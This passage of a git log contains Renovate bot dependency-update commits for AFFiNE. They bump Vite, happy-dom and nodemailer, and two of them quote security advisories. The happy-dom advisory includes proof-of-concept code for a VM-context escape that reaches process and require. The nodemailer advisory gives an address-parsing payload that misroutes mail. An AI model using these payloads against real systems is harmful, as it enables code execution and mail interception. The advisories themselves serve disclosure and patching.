([1165667](https://redirect.github.com/vitejs/vite/commit/1165667b271fb1fb76584278e72a85d564c9bb09))

##### Code Refactoring

- use `foo.endsWith("bar")` instead of `/bar$/.test(foo)`
([#&#8203;20413](https://redirect.github.com/vitejs/vite/issues/20413))
([862e192](https://redirect.github.com/vitejs/vite/commit/862e192d21f66039635a998724bdc6b94fd293a0))

###
[`v7.0.4`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-704-2025-07-10-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.0.3...v7.0.4)

##### Bug Fixes

- allow resolving bare specifiers to relative paths for entries
([#&#8203;20379](https://redirect.github.com/vitejs/vite/issues/20379))
([324669c](https://redirect.github.com/vitejs/vite/commit/324669c2d84966a822b1b2c134c9830a90bed271))

##### Build System

- remove `@oxc-project/runtime` devDep
([#&#8203;20389](https://redirect.github.com/vitejs/vite/issues/20389))
([5e29602](https://redirect.github.com/vitejs/vite/commit/5e29602f6fe4bf28f6e7c869a214dee6957f855c))

###
[`v7.0.3`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-703-2025-07-08-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.0.2...v7.0.3)

##### Bug Fixes

- **client:** protect against window being defined but addEv undefined
([#&#8203;20359](https://redirect.github.com/vitejs/vite/issues/20359))
([31d1467](https://redirect.github.com/vitejs/vite/commit/31d1467cf0da1e1dca623e6df0d345b30fae0c3d))
- **define:** replace optional values
([#&#8203;20338](https://redirect.github.com/vitejs/vite/issues/20338))
([9465ae1](https://redirect.github.com/vitejs/vite/commit/9465ae1378b456e08659a22286bee6bce8edeedc))
- **deps:** update all non-major dependencies
([#&#8203;20366](https://redirect.github.com/vitejs/vite/issues/20366))
([43ac73d](https://redirect.github.com/vitejs/vite/commit/43ac73da27b3907c701e95e6a7d28fde659729ec))

##### Miscellaneous Chores

- **deps:** update dependency dotenv to v17
([#&#8203;20325](https://redirect.github.com/vitejs/vite/issues/20325))
([45040d4](https://redirect.github.com/vitejs/vite/commit/45040d48076302eeb101f8d07bbcd04758fde8a4))
- **deps:** update dependency rolldown to ^1.0.0-beta.24
([#&#8203;20365](https://redirect.github.com/vitejs/vite/issues/20365))
([5ab25e7](https://redirect.github.com/vitejs/vite/commit/5ab25e73a2ea2a2e2c0469350288a183dfb57030))
- use `n/prefer-node-protocol` rule
([#&#8203;20368](https://redirect.github.com/vitejs/vite/issues/20368))
([38bb268](https://redirect.github.com/vitejs/vite/commit/38bb268cde15541321f36016e77d61eecb707298))

##### Code Refactoring

- minor changes to reduce diff between normal Vite and rolldown-vite
([#&#8203;20354](https://redirect.github.com/vitejs/vite/issues/20354))
([2e8050e](https://redirect.github.com/vitejs/vite/commit/2e8050e4cd8835673baf07375b7db35128144222))

###
[`v7.0.2`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-702-2025-07-04-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.0.1...v7.0.2)

##### Bug Fixes

- **css:** resolve relative paths in sass, revert
[#&#8203;20300](https://redirect.github.com/vitejs/vite/issues/20300)
([#&#8203;20349](https://redirect.github.com/vitejs/vite/issues/20349))
([db8bd41](https://redirect.github.com/vitejs/vite/commit/db8bd412a8b783fe8e9f82d1a822b0534abbf5a3))

###
[`v7.0.1`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-701-2025-07-03-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.0.0...v7.0.1)

##### Bug Fixes

- **css:** skip resolving resolved paths in sass
([#&#8203;20300](https://redirect.github.com/vitejs/vite/issues/20300))
([ac528a4](https://redirect.github.com/vitejs/vite/commit/ac528a44c384fefb6f10c3f531df93b5ac39324c))
- **deps:** update all non-major dependencies
([#&#8203;20324](https://redirect.github.com/vitejs/vite/issues/20324))
([3e81af3](https://redirect.github.com/vitejs/vite/commit/3e81af38a80c7617aba6bf3300d8b4267570f9cf))
- **types:** add a global interface for Worker
([#&#8203;20243](https://redirect.github.com/vitejs/vite/issues/20243))
([37bdfc1](https://redirect.github.com/vitejs/vite/commit/37bdfc18f4c5bed053a38c5d717df33036acdd62))

##### Miscellaneous Chores

- **deps:** update rolldown-related dependencies
([#&#8203;20323](https://redirect.github.com/vitejs/vite/issues/20323))
([30d2f1b](https://redirect.github.com/vitejs/vite/commit/30d2f1b38c72387ffdca3ee4746730959a020b59))
- fix typos and grammatical errors across documentation and comments
([#&#8203;20337](https://redirect.github.com/vitejs/vite/issues/20337))
([c1c951d](https://redirect.github.com/vitejs/vite/commit/c1c951dcc32ec9f133b03ebbceddd749fc14f1e9))
- group commits by category in changelog
([#&#8203;20310](https://redirect.github.com/vitejs/vite/issues/20310))
([41e83f6](https://redirect.github.com/vitejs/vite/commit/41e83f62b1adb65f5af4c1ec006de1c845437edc))
- rearrange 7.0 changelog
([#&#8203;20280](https://redirect.github.com/vitejs/vite/issues/20280))
([eafd28a](https://redirect.github.com/vitejs/vite/commit/eafd28ac88d5908cbc3e0a047ed7a12094386436))

###
[`v7.0.0`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#700-2025-06-24)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v6.4.1...v7.0.0)

![Vite 7 is out!](../../docs/public/og-image-announcing-vite7.png)

Today, we're excited to announce the release of the next Vite major:

- **[Vite 7.0 announcement blog
post](https://vite.dev/blog/announcing-vite7.html)**
- [Docs](https://vite.dev/) (translations: [简体中文](https://cn.vite.dev/),
[日本語](https://ja.vite.dev/), [Español](https://es.vite.dev/),
[Português](https://pt.vite.dev/), [한국어](https://ko.vite.dev/),
[Deutsch](https://de.vite.dev/), [فارسی](https://fa.vite.dev/))
- [Migration Guide](https://vite.dev/guide/migration.html)

##### ⚠ BREAKING CHANGES

- **ssr:** don't access `Object` variable in ssr transformed code
([#&#8203;19996](https://redirect.github.com/vitejs/vite/issues/19996))
- remove `experimental.skipSsrTransform` option
([#&#8203;20038](https://redirect.github.com/vitejs/vite/issues/20038))
- remove `HotBroadcaster`
([#&#8203;19988](https://redirect.github.com/vitejs/vite/issues/19988))
- **css:** always use sass compiler API
([#&#8203;19978](https://redirect.github.com/vitejs/vite/issues/19978))
- bump `build.target` and name it `baseline-widely-available`
([#&#8203;20007](https://redirect.github.com/vitejs/vite/issues/20007))
- bump required node version to 20.19+, 22.12+ and remove cjs build
([#&#8203;20032](https://redirect.github.com/vitejs/vite/issues/20032))
- **css:** remove sass legacy API support
([#&#8203;19977](https://redirect.github.com/vitejs/vite/issues/19977))
- remove deprecated `HotBroadcaster` related types
([#&#8203;19987](https://redirect.github.com/vitejs/vite/issues/19987))
- remove deprecated no-op type only properties
([#&#8203;19985](https://redirect.github.com/vitejs/vite/issues/19985))
- remove node 18 support
([#&#8203;19972](https://redirect.github.com/vitejs/vite/issues/19972))
- remove deprecated hook-level `enforce`/`transform` from
`transformIndexHtml` hook
([#&#8203;19349](https://redirect.github.com/vitejs/vite/issues/19349))
- remove deprecated splitVendorChunkPlugin
([#&#8203;19255](https://redirect.github.com/vitejs/vite/issues/19255))

##### Features

- **types:** use terser types from terser package
([#&#8203;20274](https://redirect.github.com/vitejs/vite/issues/20274))
([a5799fa](https://redirect.github.com/vitejs/vite/commit/a5799fa74c6190ecbb2da3d280136ff32463afc6))
- apply some middlewares before `configurePreviewServer` hook
([#&#8203;20224](https://redirect.github.com/vitejs/vite/issues/20224))
([b989c42](https://redirect.github.com/vitejs/vite/commit/b989c42cf84378e6cb93970de739941f0d56d6f6))
- apply some middlewares before `configureServer` hook
([#&#8203;20222](https://redirect.github.com/vitejs/vite/issues/20222))
([f5cc4c0](https://redirect.github.com/vitejs/vite/commit/f5cc4c0ded337670b439e51bc95f173e2b5cf9ad))
- add base option to import.meta.glob
([#&#8203;20163](https://redirect.github.com/vitejs/vite/issues/20163))
([253d6c6](https://redirect.github.com/vitejs/vite/commit/253d6c6df2ebe3c4a88dabb6cec000128681561f))
- add `this.meta.viteVersion`
([#&#8203;20088](https://redirect.github.com/vitejs/vite/issues/20088))
([f55bf41](https://redirect.github.com/vitejs/vite/commit/f55bf41e91f8dfe829a46e58f0035b19c8ab6a25))
- allow passing down resolved config to vite's `createServer`
([#&#8203;19894](https://redirect.github.com/vitejs/vite/issues/19894))
([c1ae9bd](https://redirect.github.com/vitejs/vite/commit/c1ae9bd4a0542b4703ae7766ad61d072e8b833bd))
- buildApp hook
([#&#8203;19971](https://redirect.github.com/vitejs/vite/issues/19971))
([5da659d](https://redirect.github.com/vitejs/vite/commit/5da659de902f0a2d6d8beefbf269128383b63887))
- **build:** provide names for asset entrypoints
([#&#8203;19912](https://redirect.github.com/vitejs/vite/issues/19912))
([c4e01dc](https://redirect.github.com/vitejs/vite/commit/c4e01dc5ab0f1708383c39d28ce62e12b8f374fc))
- bump `build.target` and name it `baseline-widely-available`
([#&#8203;20007](https://redirect.github.com/vitejs/vite/issues/20007))
([4a8aa82](https://redirect.github.com/vitejs/vite/commit/4a8aa82556eb2b9e54673a6aac77873e0eb27fa9))
- **client:** support opening fileURL in editor
([#&#8203;20040](https://redirect.github.com/vitejs/vite/issues/20040))
([1bde4d2](https://redirect.github.com/vitejs/vite/commit/1bde4d25243cd9beaadb01413e896fef562626ef))
- make PluginContext available for Vite-specific hooks
([#&#8203;19936](https://redirect.github.com/vitejs/vite/issues/19936))
([7063839](https://redirect.github.com/vitejs/vite/commit/7063839d47dfd4ac6be1247ba68e414ffe287b00))
- resolve environments plugins at config time
([#&#8203;20120](https://redirect.github.com/vitejs/vite/issues/20120))
([f6a28d5](https://redirect.github.com/vitejs/vite/commit/f6a28d5f792ba5cc4dc236e3e6edd05199cabcc8))
- stabilize `css.preprocessorMaxWorkers` and default to `true`
([#&#8203;19992](https://redirect.github.com/vitejs/vite/issues/19992))
([70aee13](https://redirect.github.com/vitejs/vite/commit/70aee139ea802478bad56e5e441f187140bcf0cc))
- stabilize `optimizeDeps.noDiscovery`
([#&#8203;19984](https://redirect.github.com/vitejs/vite/issues/19984))
([6d2dcb4](https://redirect.github.com/vitejs/vite/commit/6d2dcb494db9f40565f11b50bdbb8c1b7245697d))

##### Bug Fixes

- **deps:** update all non-major dependencies
([#&#8203;20271](https://redirect.github.com/vitejs/vite/issues/20271))
([6b64d63](https://redirect.github.com/vitejs/vite/commit/6b64d63d700154de2c00270

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-10-21 16:12:43 +00:00
renovate[bot] 50f41c2212 chore: bump up happy-dom version to v20 [SECURITY] (#13726)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom) |
[`^18.0.0` ->
`^20.0.0`](https://renovatebot.com/diffs/npm/happy-dom/18.0.1/20.0.0) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/happy-dom/20.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/happy-dom/18.0.1/20.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-61927](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f)

# Escape of VM Context gives access to process level functionality

## Summary
Happy DOM v19 and lower contains a security vulnerability that puts the
owner system at the risk of RCE (Remote Code Execution) attacks.

A Node.js VM Context is not an isolated environment, and if the user
runs untrusted JavaScript code within the Happy DOM VM Context, it may
escape the VM and get access to process level functionality.

What the attacker can get control over depends on if the process is
using ESM or CommonJS. With CommonJS the attacker can get hold of the
`require()` function to import modules.

Happy DOM has JavaScript evaluation enabled by default. This may not be
obvious to the consumer of Happy DOM and can potentially put the user at
risk if untrusted code is executed within the environment.

## Reproduce

### CommonJS (Possible to get hold of require)

```javascript
const { Window } = require('happy-dom');
const window = new Window({ console });

window.document.write(`
  <script>
     const process = this.constructor.constructor('return process')();
     const require = process.mainModule.require;
  
     console.log('Files:', require('fs').readdirSync('.').slice(0,3));
  </script>
`);
```

### ESM (Not possible to get hold of import or require)

```javascript
const { Window } = require('happy-dom');
const window = new Window({ console });

window.document.write(`
  <script>
     const process = this.constructor.constructor('return process')();
  
     console.log('PID:', process.pid);
  </script>
`);
```

## Potential Impact

#### Server-Side Rendering (SSR)
```javascript
const { Window } = require('happy-dom');
const window = new Window();
window.document.innerHTML = userControlledHTML;
```

#### Testing Frameworks
Any test suite using Happy-DOM with untrusted content may be at risk.

## Attack Scenarios

1. **Data Exfiltration**: Access to environment variables, configuration
files, secrets
2. **Lateral Movement**: Network access for connecting to internal
systems. Happy DOM already gives access to the network by fetch, but has
protections in place (such as CORS and header validation etc.).
3. **Code Execution**: Child process access for running arbitrary
commands
4. **Persistence**: File system access

## Recommended Immediate Actions

1. Update Happy DOM to v20 or above
    - This version has JavaScript evaluation disabled by default
- This version will output a warning if JavaScript is enabled in an
insecure environment
2. Run Node.js with the "--disallow-code-generation-from-strings" if you
need JavaScript evaluation enabled
- This makes sure that evaluation can't be used at process level to
escape the VM
- `eval()` and `Function()` can still be used within the Happy DOM VM
without any known security risk
- Happy DOM v20 and above will output a warning if this flag is not in
use
4. If you can't update Happy DOM right now, it's recommended to disable
JavaScript evaluation, unless you completely trust the content within
the environment

## Technical Root Cause

All classes and functions inherit from
[Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).
By walking the constructor chain it's possible to get hold of
[Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function)
at process level. As
[Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function)
can evaluate code from strings, it's possible to execute code at process
level.

Running Node with the "--disallow-code-generation-from-strings" flag
protects against this.

---

### Release Notes

<details>
<summary>capricorn86/happy-dom (happy-dom)</summary>

###
[`v20.0.0`](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...819d15ba289495439eda8be360d92a614ce22405)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...v20.0.0)

###
[`v19.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.2)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.1...v19.0.2)

##### :construction\_worker\_man: Patch fixes

- Fixes issue related to CSS pseudo selector `:scope` that didn't work
correctly for direct descendants to root - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620)

###
[`v19.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.1)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.0...v19.0.1)

##### :construction\_worker\_man: Patch fixes

- Fixes issue with sending in URLs as string in
`@happy-dom/server-renderer` config using CLI - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1908](https://redirect.github.com/capricorn86/happy-dom/issues/1908)

###
[`v19.0.0`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.0)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v18.0.1...v19.0.0)

##### 💣 Breaking Changes

- Removes support for CommonJS - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Support for CommonJS is no longer needed as Node.js v18 is deprecated
and v20 and above supports loading ES modules from CommonJS using
`require()`
- Updates Jest to v30 in the `@happy-dom/jest-environment` package - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Makes Jest packages peer dependencies to make it easier to align
versions with the project using `@happy-dom/jest-environment` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)

##### 🎨 Features

- Adds a new package called `@happy-dom/server-renderer` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- This package provides a simple way to statically render (SSG) or
server-side render (SSR) your client-side application
- Read more in the Wiki under
[Server-Renderer](https://redirect.github.com/capricorn86/happy-dom/wiki/Server-Renderer)
- Adds support for `import.meta` to the ESM compiler - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the CSS pseudo selector `:scope` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620)
- Improves support for `MediaList` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for `CSSKeywordValue`, `CSSStyleValue`,
`StylePropertyMap`, `StylePropertyMap`, `StylePropertyMapReadOnly` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Improves debug information in the ESM compiler - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds validation of browser settings when creating a new `Browser`
instance - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the browser setting
[navigation.beforeContentCallback](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings)
which makes it possible to inject event listeners or logic before
content is loaded to the document when navigating a browser frame - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the browser setting
[fetch.requestHeaders](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings)
which provides with a declarative and simple way to add request headers
- By **[@&#8203;capricorn86](https://redirect.github.com/capricorn86)**
in task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for setting an object to
[timer.preventTimerLoops](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings)
which makes it possible to define different settings for `setTimeout()`
and `requestAnimationFrame()` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the browser setting
[viewport](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings)
which makes it possible to define a default viewport size - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the parameters `beforeContentCallback` and `headers`
to `BrowserFrame.goto()`, `BrowserFrame.goBack()`,
`BrowserFrame.goForward()`, `BrowserFrame.goSteps()` and
`BrowserFrame.reload()` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for `PopStateEvent` and trigger the event when navigating
the page history using `History.pushState()` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Use local file paths for virtual server files in stack traces - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for `ResponseCache.fileSystem.load()` and
`ResponseCache.fileSystem.save()` for storing and loading cache from the
file system - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)

##### :construction\_worker\_man: Patch fixes

- Fixes a bug in the ESM compiler that caused it to fail to parse
certain code - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Disables the same origin policy when navigating a browser frame using
`BrowserFrame.goto()` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Fixes bug where CSS selectors with the pseudos "+" and ">" failed for
selectors without arguments - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds try and catch to listeners for events dispatched from
`XMLHttpRequest` to prevent it from being set to an invalid state if a
listener throws an Error - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-10-13 14:07:31 +00:00
renovate[bot] bf72833f05 chore: bump up nodemailer version to v7.0.7 [SECURITY] (#13704)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [nodemailer](https://nodemailer.com/)
([source](https://redirect.github.com/nodemailer/nodemailer)) | [`7.0.3`
-> `7.0.7`](https://renovatebot.com/diffs/npm/nodemailer/7.0.3/7.0.7) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/nodemailer/7.0.7?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/nodemailer/7.0.3/7.0.7?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[GHSA-mm7p-fcc7-pg87](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87)

The email parsing library incorrectly handles quoted local-parts
containing @&#8203;. This leads to misrouting of email recipients, where
the parser extracts and routes to an unintended domain instead of the
RFC-compliant target.

Payload: `"xclow3n@gmail.com x"@&#8203;internal.domain`
Using the following code to send mail
```
const nodemailer = require("nodemailer");

let transporter = nodemailer.createTransport({
  service: "gmail",
  auth: {
    user: "",
    pass: "",
  },
});

let mailOptions = {
  from: '"Test Sender" <your_email@gmail.com>', 
  to: "\"xclow3n@gmail.com x\"@&#8203;internal.domain",
  subject: "Hello from Nodemailer",
  text: "This is a test email sent using Gmail SMTP and Nodemailer!",
};

transporter.sendMail(mailOptions, (error, info) => {
  if (error) {
    return console.log("Error: ", error);
  }
  console.log("Message sent: %s", info.messageId);

});

(async () => {
  const parser = await import("@&#8203;sparser/email-address-parser");
  const { EmailAddress, ParsingOptions } = parser.default;
  const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);

  if (!parsed) {
    console.error("Invalid email address:", mailOptions.to);
    return;
  }

  console.log("Parsed email:", {
    address: `${parsed.localPart}@&#8203;${parsed.domain}`,
    local: parsed.localPart,
    domain: parsed.domain,
  });
})();
```

Running the script and seeing how this mail is parsed according to RFC

```
Parsed email: {
  address: '"xclow3n@gmail.com x"@&#8203;internal.domain',
  local: '"xclow3n@gmail.com x"',
  domain: 'internal.domain'
}
```

But the email is sent to `xclow3n@gmail.com`

<img width="2128" height="439" alt="Image"
src="https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d"
/>

### Impact:

- Misdelivery / Data leakage: Email is sent to psres.net instead of
test.com.

- Filter evasion: Logs and anti-spam systems may be bypassed by hiding
recipients inside quoted local-parts.

-    Potential compliance issue: Violates RFC 5321/5322 parsing rules.

- Domain based access control bypass in downstream applications using
your library to send mails

### Recommendations

-    Fix parser to correctly treat quoted local-parts per RFC 5321/5322.

- Add strict validation rejecting local-parts containing embedded
@&#8203; unless fully compliant with quoting.

---

### Release Notes

<details>
<summary>nodemailer/nodemailer (nodemailer)</summary>

###
[`v7.0.7`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#707-2025-10-05)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.6...v7.0.7)

##### Bug Fixes

- **addressparser:** Fixed addressparser handling of quoted nested email
addresses
([1150d99](https://redirect.github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626))
- **dns:** add memory leak prevention for DNS cache
([0240d67](https://redirect.github.com/nodemailer/nodemailer/commit/0240d6795ded6d8008d102161a729f120b6d786a))
- **linter:** Updated eslint and created prettier formatting task
([df13b74](https://redirect.github.com/nodemailer/nodemailer/commit/df13b7487e368acded35e45d0887d23c89c9177a))
- refresh expired DNS cache on error
([#&#8203;1759](https://redirect.github.com/nodemailer/nodemailer/issues/1759))
([ea0fc5a](https://redirect.github.com/nodemailer/nodemailer/commit/ea0fc5a6633a3546f4b00fcf2f428e9ca732cdb6))
- resolve linter errors in DNS cache tests
([3b8982c](https://redirect.github.com/nodemailer/nodemailer/commit/3b8982c1f24508089a8757b74039000a4498b158))

###
[`v7.0.6`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#706-2025-08-27)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.5...v7.0.6)

##### Bug Fixes

- **encoder:** avoid silent data loss by properly flushing trailing
base64
([#&#8203;1747](https://redirect.github.com/nodemailer/nodemailer/issues/1747))
([01ae76f](https://redirect.github.com/nodemailer/nodemailer/commit/01ae76f2cfe991c0c3fe80170f236da60531496b))
- handle multiple XOAUTH2 token requests correctly
([#&#8203;1754](https://redirect.github.com/nodemailer/nodemailer/issues/1754))
([dbe0028](https://redirect.github.com/nodemailer/nodemailer/commit/dbe00286351cddf012726a41a96ae613d30a34ee))
- ReDoS vulnerability in parseDataURI and \_processDataUrl
([#&#8203;1755](https://redirect.github.com/nodemailer/nodemailer/issues/1755))
([90b3e24](https://redirect.github.com/nodemailer/nodemailer/commit/90b3e24d23929ebf9f4e16261049b40ee4055a39))

###
[`v7.0.5`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#705-2025-07-07)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.4...v7.0.5)

##### Bug Fixes

- updated well known delivery service list
([fa2724b](https://redirect.github.com/nodemailer/nodemailer/commit/fa2724b337eb8d8fdcdd788fe903980b061316b8))

###
[`v7.0.4`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#704-2025-06-29)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.3...v7.0.4)

##### Bug Fixes

- **pools:** Emit 'clear' once transporter is idle and all connections
are closed
([839e286](https://redirect.github.com/nodemailer/nodemailer/commit/839e28634c9a93ae4321f399a8c893bf487a09fa))
- **smtp-connection:** jsdoc public annotation for socket
([#&#8203;1741](https://redirect.github.com/nodemailer/nodemailer/issues/1741))
([c45c84f](https://redirect.github.com/nodemailer/nodemailer/commit/c45c84fe9b8e2ec5e0615ab02d4197473911ab3e))
- **well-known-services:** Added AliyunQiye
([bb9e6da](https://redirect.github.com/nodemailer/nodemailer/commit/bb9e6daffb632d7d8f969359859f88a138de3a48))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzEuOSIsInVwZGF0ZWRJblZlciI6IjQxLjEzMS45IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

